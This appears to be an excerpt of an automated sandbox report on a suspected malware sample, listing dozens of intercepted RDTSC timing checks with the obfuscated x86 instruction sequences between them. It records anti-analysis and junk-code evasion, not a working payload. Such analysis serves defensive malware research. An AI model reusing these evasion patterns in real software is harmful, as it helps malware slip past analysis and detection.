                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 53007FA second address: 5300862 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F29FC524587h 0x00000008 and esi, 4963A50Eh 0x0000000e jmp 00007F29FC524589h 0x00000013 popfd 0x00000014 pop edx 0x00000015 pop eax 0x00000016 pushad 0x00000017 jmp 00007F29FC52457Eh 0x0000001c mov bh, cl 0x0000001e popad 0x0000001f popad 0x00000020 push eax 0x00000021 jmp 00007F29FC52457Ah 0x00000026 mov dword ptr [esp], eax 0x00000029 push eax 0x0000002a push edx 0x0000002b pushad 0x0000002c mov ebx, 31C5E4D0h 0x00000031 mov bh, 7Dh 0x00000033 popad 0x00000034 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 5300890 second address: 53008C4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5C9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp-04h], 00000000h 0x0000000d jmp 00007F29FC6B5CA6h 0x00000012 mov esi, eax 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 53008C4 second address: 53008CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, 3FDD17EEh 0x00000009 popad 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 53008CE second address: 53008DD instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC6B5C9Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 53008DD second address: 53008E1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 53008E1 second address: 53008F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 je 00007F29FC6B5CE7h 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 pop ebx 0x00000013 movzx esi, bx 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 530092E second address: 5300934 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 5300934 second address: 5300938 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 5300938 second address: 52F0045 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, esi 0x0000000a jmp 00007F29FC524587h 0x0000000f pop esi 0x00000010 jmp 00007F29FC524586h 0x00000015 leave 0x00000016 pushad 0x00000017 mov si, di 0x0000001a popad 0x0000001b retn 0004h 0x0000001e nop 0x0000001f sub esp, 04h 0x00000022 xor ebx, ebx 0x00000024 cmp eax, 00000000h 0x00000027 je 00007F29FC5246DAh 0x0000002d mov dword ptr [esp], 0000000Dh 0x00000034 call 00007F2A01680711h 0x00000039 mov edi, edi 0x0000003b push eax 0x0000003c push edx 0x0000003d pushad 0x0000003e call 00007F29FC524582h 0x00000043 pop ecx 0x00000044 pushfd 0x00000045 jmp 00007F29FC52457Bh 0x0000004a and ecx, 5015F23Eh 0x00000050 jmp 00007F29FC524589h 0x00000055 popfd 0x00000056 popad 0x00000057 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0045 second address: 52F004B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F004B second address: 52F004F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F004F second address: 52F0065 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F29FC6B5C9Bh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0065 second address: 52F008B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC524589h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esp], ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov cl, bl 0x00000011 popad 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F008B second address: 52F00AB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov ax, D69Dh 0x00000007 mov edi, eax 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov ebp, esp 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F29FC6B5C9Eh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F00AB second address: 52F00BA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC52457Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F00BA second address: 52F0112 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub esp, 2Ch 0x0000000c pushad 0x0000000d mov ax, 56A3h 0x00000011 pushfd 0x00000012 jmp 00007F29FC6B5CA8h 0x00000017 sbb esi, 4F78A7E8h 0x0000001d jmp 00007F29FC6B5C9Bh 0x00000022 popfd 0x00000023 popad 0x00000024 xchg eax, ebx 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0112 second address: 52F0116 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0116 second address: 52F011A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F011A second address: 52F0120 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0120 second address: 52F0143 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5C9Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b call 00007F29FC6B5CA1h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0143 second address: 52F0157 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 mov edx, 75BAF642h 0x0000000a popad 0x0000000b xchg eax, ebx 0x0000000c pushad 0x0000000d movsx edx, si 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0157 second address: 52F0166 instructions: 0x00000000 rdtsc 0x00000002 movzx esi, bx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 push esp 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0166 second address: 52F016A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F016A second address: 52F0170 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F0170 second address: 52F01A0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F29FC524586h 0x00000008 pushad 0x00000009 popad 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov dword ptr [esp], edi 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F29FC52457Dh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F01D0 second address: 52F01D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F01D4 second address: 52F01DA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exeRDTSC instruction interceptor: First address: 52F01DA second address: 52F024E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5CA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 sub edi, edi 0x0000000b pushad 0x0000000c call 00007F29FC6B5C9Dh 0x00000011 pushad 0x00000012 popad 0x00000013 pop eax 0x00000014 pushfd 0x00000015 jmp 00007F29FC6B5CA7h 0x0000001a xor ax, 881Eh 0x0000001f jmp 00007F29FC6B5CA9h 0x00000024 popfd 0x00000025 popad 0x00000026 inc ebx 0x00000027 push eax 0x00000028 push edx 0x00000029 jmp 00007F29FC6B5C9Dh 0x0000002e rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52F024E second address: 52F029A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 59E2h 0x00000007 push edx 0x00000008 pop esi 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c test al, al 0x0000000e pushad 0x0000000f pushfd 0x00000010 jmp 00007F29FC52457Bh 0x00000015 and al, FFFFFFDEh 0x00000018 jmp 00007F29FC524589h 0x0000001d popfd 0x0000001e popad 0x0000001f je 00007F29FC52477Bh 0x00000025 pushad 0x00000026 mov di, C83Eh 0x0000002a pushad 0x0000002b mov ebx, 3571F2D8h 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52F029A second address: 52F02F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 lea ecx, dword ptr [ebp-14h] 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007F29FC6B5CA6h 0x00000012 sbb cx, BD38h 0x00000017 jmp 00007F29FC6B5C9Bh 0x0000001c popfd 0x0000001d pushfd 0x0000001e jmp 00007F29FC6B5CA8h 0x00000023 sbb si, 3798h 0x00000028 jmp 00007F29FC6B5C9Bh 0x0000002d popfd 0x0000002e popad 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52F02F9 second address: 52F02FF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52F0327 second address: 52F033B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5CA0h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52F033B second address: 52F0341 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52F0341 second address: 52F0345 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52F0345 second address: 52F0349 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52F03C2 second address: 52F03C8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52F03C8 second address: 52F03CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52F03CC second address: 52F043D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5CA5h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test eax, eax 0x0000000d pushad 0x0000000e mov dh, ch 0x00000010 pushfd 0x00000011 jmp 00007F29FC6B5CA9h 0x00000016 or ax, 2D76h 0x0000001b jmp 00007F29FC6B5CA1h 0x00000020 popfd 0x00000021 popad 0x00000022 jg 00007F2A6C7B3D04h 0x00000028 jmp 00007F29FC6B5C9Eh 0x0000002d js 00007F29FC6B5CF0h 0x00000033 pushad 0x00000034 push eax 0x00000035 push edx 0x00000036 mov bl, ah 0x00000038 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52E0E1D second address: 52E0E4C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov esi, ebx 0x00000005 jmp 00007F29FC52457Bh 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebp 0x0000000e jmp 00007F29FC524586h 0x00000013 push eax 0x00000014 pushad 0x00000015 push ebx 0x00000016 push eax 0x00000017 push edx 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52E0E4C second address: 52E0E67 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 mov eax, edi 0x00000007 popad 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F29FC6B5CA0h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52E0E67 second address: 52E0EF9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC52457Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebp, esp 0x0000000b jmp 00007F29FC524586h 0x00000010 xchg eax, ecx 0x00000011 pushad 0x00000012 call 00007F29FC52457Eh 0x00000017 pushfd 0x00000018 jmp 00007F29FC524582h 0x0000001d and ax, 9F78h 0x00000022 jmp 00007F29FC52457Bh 0x00000027 popfd 0x00000028 pop eax 0x00000029 mov eax, edx 0x0000002b popad 0x0000002c push eax 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 movsx ebx, cx 0x00000033 pushfd 0x00000034 jmp 00007F29FC524588h 0x00000039 sub esi, 09C6C908h 0x0000003f jmp 00007F29FC52457Bh 0x00000044 popfd 0x00000045 popad 0x00000046 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52E0EF9 second address: 52E0F54 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F29FC6B5C9Fh 0x00000008 mov ecx, 0A32AA6Fh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 xchg eax, ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 pushad 0x00000014 pushfd 0x00000015 jmp 00007F29FC6B5CA7h 0x0000001a and ecx, 56EE06AEh 0x00000020 jmp 00007F29FC6B5CA9h 0x00000025 popfd 0x00000026 mov si, 3F37h 0x0000002a popad 0x0000002b rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52E0FAA second address: 52E0FD3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edx, cx 0x00000006 call 00007F29FC524580h 0x0000000b pop eax 0x0000000c popad 0x0000000d pop edx 0x0000000e pop eax 0x0000000f leave 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F29FC52457Ch 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52E0FD3 second address: 52E0FD9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52E0FD9 second address: 52E0FDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52F0B6F second address: 52F0B74 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52F0B74 second address: 52F0B8B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov bl, 3Dh 0x00000006 popad 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F29FC52457Bh 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52F0B8B second address: 52F0BC2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b movsx edx, si 0x0000000e mov bx, ax 0x00000011 popad 0x00000012 xchg eax, ebp 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007F29FC6B5C9Ch 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52F0BC2 second address: 52F0BC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52F0BC8 second address: 52F0BDA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 mov bx, si 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b mov ebp, esp 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 mov ch, D8h 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52F0BDA second address: 52F0C05 instructions: 0x00000000 rdtsc 0x00000002 mov dx, 08A0h 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov edx, 5A480ECCh 0x0000000d popad 0x0000000e cmp dword ptr [7544459Ch], 05h 0x00000015 jmp 00007F29FC52457Bh 0x0000001a je 00007F2A6C61237Bh 0x00000020 push eax 0x00000021 push edx 0x00000022 pushad 0x00000023 push eax 0x00000024 push edx 0x00000025 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52F0C05 second address: 52F0C34 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007F29FC6B5CA1h 0x0000000a add esi, 6BFA0656h 0x00000010 jmp 00007F29FC6B5CA1h 0x00000015 popfd 0x00000016 popad 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52F0CB7 second address: 52F0CE9 instructions: 0x00000000 rdtsc 0x00000002 call 00007F29FC524588h 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push 5E4AD2E0h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007F29FC52457Dh 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52F0CE9 second address: 52F0CEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52F0CEF second address: 52F0D49 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xor dword ptr [esp], 2B094EC8h 0x0000000f pushad 0x00000010 mov edx, eax 0x00000012 popad 0x00000013 call 00007F2A6C6193E6h 0x00000018 push 753E2B70h 0x0000001d push dword ptr fs:[00000000h] 0x00000024 mov eax, dword ptr [esp+10h] 0x00000028 mov dword ptr [esp+10h], ebp 0x0000002c lea ebp, dword ptr [esp+10h] 0x00000030 sub esp, eax 0x00000032 push ebx 0x00000033 push esi 0x00000034 push edi 0x00000035 mov eax, dword ptr [75444538h] 0x0000003a xor dword ptr [ebp-04h], eax 0x0000003d xor eax, ebp 0x0000003f push eax 0x00000040 mov dword ptr [ebp-18h], esp 0x00000043 push dword ptr [ebp-08h] 0x00000046 mov eax, dword ptr [ebp-04h] 0x00000049 mov dword ptr [ebp-04h], FFFFFFFEh 0x00000050 mov dword ptr [ebp-08h], eax 0x00000053 lea eax, dword ptr [ebp-10h] 0x00000056 mov dword ptr fs:[00000000h], eax 0x0000005c ret 0x0000005d jmp 00007F29FC52457Ah 0x00000062 sub esi, esi 0x00000064 push eax 0x00000065 push edx 0x00000066 pushad 0x00000067 pushfd 0x00000068 jmp 00007F29FC52457Ah 0x0000006d add al, FFFFFF88h 0x00000070 jmp 00007F29FC52457Bh 0x00000075 popfd 0x00000076 jmp 00007F29FC524588h 0x0000007b popad 0x0000007c rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52F0D49 second address: 52F0D61 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5C9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [ebp-1Ch], esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52F0D61 second address: 52F0D65 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52F0D65 second address: 52F0D69 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52F0D69 second address: 52F0D6F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52F0D6F second address: 52F0D75 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52F0D75 second address: 52F0D79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52F0D79 second address: 52F0D7D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52F0DD4 second address: 52F0DEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F29FC524584h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52F0DEC second address: 52F0E1F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5C9Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b test al, al 0x0000000d pushad 0x0000000e mov edi, esi 0x00000010 jmp 00007F29FC6B5CA0h 0x00000015 popad 0x00000016 je 00007F2A6C799808h 0x0000001c push eax 0x0000001d push edx 0x0000001e push eax 0x0000001f push edx 0x00000020 push eax 0x00000021 push edx 0x00000022 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52F0E1F second address: 52F0E23 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52F0E23 second address: 52F0E40 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC6B5CA9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 52F0E40 second address: 52F0E97 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC524581h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 cmp dword ptr [ebp+08h], 00002000h 0x00000010 push eax 0x00000011 push edx 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007F29FC524583h 0x00000019 or ax, 156Eh 0x0000001e jmp 00007F29FC524589h 0x00000023 popfd 0x00000024 mov ax, AEF7h 0x00000028 popad 0x00000029 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 53009A2 second address: 53009BF instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov eax, 7E5610ADh 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F29FC6B5C9Fh 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 53009BF second address: 5300A1F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F29FC52457Fh 0x00000009 jmp 00007F29FC524583h 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007F29FC524588h 0x00000015 add cx, 9808h 0x0000001a jmp 00007F29FC52457Bh 0x0000001f popfd 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 push eax 0x00000024 push eax 0x00000025 push edx 0x00000026 pushad 0x00000027 mov cx, 6F11h 0x0000002b mov dx, si 0x0000002e popad 0x0000002f rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 5300A1F second address: 5300A25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 5300A25 second address: 5300A49 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F29FC524585h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c pushad 0x0000000d mov al, 6Eh 0x0000000f pushad 0x00000010 mov al, bl 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\zi042476Iv.exe RDTSC instruction interceptor: First address: 5300A49 second address: 5300A77 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 popad 0x00000006 mov ebp, esp 0x00000008 jmp 00007F29FC6B5C9Ch 0x0000000d xchg eax, esi 0x0000000e push eax 0x0000000f push edx 0x00000010 jmp 00007F29FC6B5CA7h 0x00000015 rdtsc
